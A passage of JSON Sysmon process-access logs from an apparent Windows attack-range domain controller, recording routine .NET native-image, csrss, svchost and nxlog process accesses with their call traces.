{"EventTime":"2020-08-01 06:59:08","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6896,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:59:08.225\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 804\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-12BC-5F25-0000-00102DC20900}\r\nTargetProcessId: 4280\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:59:08.225","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"804","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-12BC-5F25-0000-00102DC20900}","TargetProcessId":"4280","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 06:59:09","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:59:08","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6897,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:59:08.257\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-12BC-5F25-0000-00102DC20900}\r\nTargetProcessId: 4280\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:59:08.257","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-12BC-5F25-0000-00102DC20900}","TargetProcessId":"4280","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:59:09","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:59:08","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6898,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:59:08.257\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-12B5-5F25-0000-0010638D0900}\r\nTargetProcessId: 4792\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:59:08.257","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-12B5-5F25-0000-0010638D0900}","TargetProcessId":"4792","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:59:09","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:59:08","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6899,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:59:08.491\r\nSourceProcessGUID: {E2A3D6B1-12B5-5F25-0000-0010638D0900}\r\nSourceProcessId: 4792\r\nSourceThreadId: 4384\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {E2A3D6B1-12BC-5F25-0000-0010A0C50900}\r\nTargetProcessId: 4396\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:59:08.491","SourceProcessGUID":"{E2A3D6B1-12B5-5F25-0000-0010638D0900}","SourceProcessId":"4792","SourceThreadId":"4384","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{E2A3D6B1-12BC-5F25-0000-0010A0C50900}","TargetProcessId":"4396","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:59:09","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:59:08","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6900,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:59:08.491\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 1212\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-12BC-5F25-0000-0010A0C50900}\r\nTargetProcessId: 4396\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:59:08.491","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"1212","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-12BC-5F25-0000-0010A0C50900}","TargetProcessId":"4396","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 06:59:09","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:59:08","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6901,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:59:08.491\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-12BC-5F25-0000-0010A0C50900}\r\nTargetProcessId: 4396\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:59:08.491","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-12BC-5F25-0000-0010A0C50900}","TargetProcessId":"4396","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:59:09","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:59:08","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6902,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:59:08.553\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3592\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:59:08.553","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3592","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:59:09","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:59:08","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6903,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:59:08.725\r\nSourceProcessGUID: {E2A3D6B1-12B5-5F25-0000-0010638D0900}\r\nSourceProcessId: 4792\r\nSourceThreadId: 4456\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {E2A3D6B1-12BC-5F25-0000-0010FAC80900}\r\nTargetProcessId: 3756\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:59:08.725","SourceProcessGUID":"{E2A3D6B1-12B5-5F25-0000-0010638D0900}","SourceProcessId":"4792","SourceThreadId":"4456","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{E2A3D6B1-12BC-5F25-0000-0010FAC80900}","TargetProcessId":"3756","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 